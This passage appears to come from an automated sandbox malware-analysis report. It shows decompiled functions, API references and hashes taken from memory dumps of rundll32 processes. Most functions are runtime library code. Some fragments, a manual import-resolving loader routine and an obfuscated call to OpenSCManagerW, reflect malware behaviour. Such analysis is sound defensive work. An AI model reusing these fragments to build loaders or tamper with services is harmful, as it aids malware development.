						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}

0x1000b3a2
0x1000b3b0
0x1000b3b5
0x1000b3c4
0x1000b3f7
0x1000b3c9
0x1000b3cb
0x1000b3cb
0x1000b3d8
0x1000b3de
0x1000b3e2
0x1000b442
0x1000b442
0x1000b3e4
0x1000b3ea
0x1000b42c
0x1000b440
0x00000000
0x1000b3ec
0x1000b3f5
0x1000b414
0x1000b428
0x1000b40e
0x1000b40e
0x00000000
0x00000000
0x00000000
0x1000b3f5
0x1000b3ea
0x00000000
0x1000b410
0x1000b3fd
0x1000b408
0x00000000
0x1000b3b7
0x1000b3ba
0x1000b3c0
0x1000b3c0
0x1000b411
0x1000b413
0x1000b3a4
0x1000b3ae
0x1000b3ae

APIs

_malloc.LIBCMT ref: 1000B3A7

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00270000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

_free.LIBCMT ref: 1000B3BA

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750

Uniqueness

Uniqueness Score: -1.00%

Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}

0x1000883c
0x1000883c
0x1000883c
0x1000883e
0x10008843
0x1000884d
0x1000884f
0x10008858
0x10008879
0x1000887f
0x10008883
0x10008886
0x10008889
0x1000888f
0x10008891
0x10008893
0x1000889c
0x1000889e
0x100088a0
0x100088a6
0x100088a9
0x100088ae
0x100088a6
0x1000889e
0x100088af
0x100088b4
0x100088b7
0x100088bd
0x100088c1
0x100088c1
0x100088c7
0x100088ce
0x10008860
0x10008860
0x10008860
0x10008863
0x10008865
0x10008869
0x1000886e
0x10008876

APIs

Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095

__amsg_exit.LIBCMT ref: 10008869
__lock.LIBCMT ref: 10008879
InterlockedDecrement.KERNEL32(?), ref: 10008896
_free.LIBCMT ref: 100088A9
InterlockedIncrement.KERNEL32(10012690), ref: 100088C1

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

0x10001479
0x1000147c
0x1000147e
0x1000147e
0x10001488
0x1000148b
0x100015db
0x100015e4
0x10001491
0x10001497
0x1000149c
0x100014a7
0x100014b0
0x100014b0
0x100014b5
0x00000000
0x00000000
0x100014bb
0x100014c1
0x100014c6
0x100014c8
0x100014cb
0x100014d0
0x100015c8
0x100015d6
0x100014d6
0x100014d6
0x100014e1
0x100014e9
0x100014eb
0x100014f0
0x100015a7
0x100015aa
0x100015ae
0x100015b5
0x100015c3
0x100014f6
0x100014f6
0x100014f9
0x100014fc
0x100014fe
0x10001501
0x10001504
0x10001508
0x1000151a
0x1000151d
0x1000150a
0x1000150a
0x1000150d
0x10001513
0x10001513
0x1000151f
0x10001523
0x1000156a
0x1000156a
0x10001570
0x1000157b
0x00000000
0x1000157d
0x1000157d
0x00000000
0x1000157d
0x10001525
0x10001525
0x10001527
0x10001530
0x10001530
0x10001530
0x10001533
0x10001538
0x10001545
0x1000153a
0x1000153a
0x1000153a
0x10001548
0x1000154c
0x1000154e
0x10001551
0x10001555
0x00000000
0x00000000
0x10001557
0x1000155a
0x1000155d
0x10001560
0x10001565
0x00000000
0x10001567
0x10001567
0x00000000
0x10001567
0x00000000
0x10001565
0x10001585
0x1000158b
0x1000158f
0x10001596
0x100015a4
0x100015a4
0x10001523
0x100014f0
0x00000000
0x100014d0
0x100014b0
0x00000000
0x100014a7
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8

Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA

IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
SetLastError.KERNEL32(0000007F), ref: 10001596
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$Read$QueryVirtual
String ID:
API String ID: 4108280708-0
Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x1000a362
0x1000a367
0x1000a381
0x00000000
0x1000a381
0x1000a369
0x1000a36e
0x00000000
0x00000000
0x1000a373
0x1000a38e
0x1000a393
0x1000a396
0x1000a39d
0x1000a3bc
0x1000a3c3
0x1000a3c5
0x1000a409
0x1000a411
0x1000a420
0x1000a426
0x1000a428
0x1000a438
0x1000a438
0x1000a43c
0x1000a43e
0x1000a441
0x1000a441
0x1000a441
0x1000a441
0x00000000
0x1000a447
0x1000a42a
0x1000a42a
0x1000a42f
0x1000a42f
0x1000a432
0x00000000
0x1000a432
0x1000a3c7
0x1000a3ca
0x1000a3ce
0x1000a3f7
0x1000a3f7
0x1000a3fa
0x1000a3fa
0x00000000
0x00000000
0x1000a3fc
0x1000a400
0x00000000
0x00000000
0x1000a402
0x1000a402
0x00000000
0x1000a402
0x1000a3d0
0x1000a3d3
0x00000000
0x00000000
0x1000a3d7
0x1000a3ea
0x1000a3f0
0x1000a3f3
0x1000a3f5
0x00000000
0x00000000
0x00000000
0x1000a3f5
0x1000a39f
0x1000a3a2
0x1000a3a4
0x1000a3a9
0x1000a3a9
0x1000a3ae
0x00000000
0x1000a3ae
0x1000a375
0x1000a37a
0x1000a37e
0x1000a37e
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
__isleadbyte_l.LIBCMT ref: 1000A3BC
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x10006610
0x10006610
0x10006613
0x10006618
0x1000661b
0x1000661d
0x10006620
0x10006623
0x10006624
0x10006627
0x1000662c
0x1000662c
0x1000662f
0x10006633
0x10006636
0x1000663b
0x10006638
0x10006638
0x10006638
0x1000663e
0x10006643
0x10006644
0x10006647
0x10006649
0x1000664c
0x1000664f
0x10006650
0x10006658
0x1000665d
0x10006661
0x10006667
0x1000666a
0x1000666d
0x10006670
0x10006671
0x10006674
0x1000667f
0x10006683
0x00000000
0x10006683
0x1000668a

APIs

___BuildCatchObject.LIBCMT ref: 10006627

Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81

_UnwindNestedFrames.LIBCMT ref: 1000663E
___FrameUnwindToState.LIBCMT ref: 10006650
CallCatchBlock.LIBCMT ref: 10006674

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,06BF92EE), ref: 100032E3

Strings

Recipe (.recipe) Property Handler, xrefs: 100032A6

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FileFromModuleNameString
String ID: Recipe (.recipe) Property Handler
API String ID: 1402647516-129706424
Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}

0x10001984
0x10001989
0x10001a09
0x10001a09
0x1000198f
0x10001993
0x100019a0
0x100019a0
0x100019a6
0x100019e2
0x100019e2
0x100019e7
0x100019f1
0x100019f1
0x00000000
0x100019a8
0x100019a9
0x100019ae
0x100019cc
0x100019cc
0x100019d2
0x100019dc
0x100019dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100019b0
0x100019b0
0x100019b3
0x100019b8
0x100019c1
0x100019c3
0x100019c3
0x100019c6
0x100019c7
0x00000000
0x100019b0

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Free$HeapVirtual$Process
String ID:
API String ID: 3505259878-0
Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2828 Parent PID: 1204 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	993
Total number of Limit Nodes:	14

Executed Functions

Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0021295f
0x00212964
0x00212967
0x0021296a
0x0021296d
0x0021296e
0x0021296f
0x00212977
0x00212985
0x0021298a
0x00212992
0x0021299a
0x002129a2
0x002129a9
0x002129b0
0x002129b7
0x002129bb
0x002129cf
0x002129dc
0x002129e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC

Strings

<^, xrefs: 00212977

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
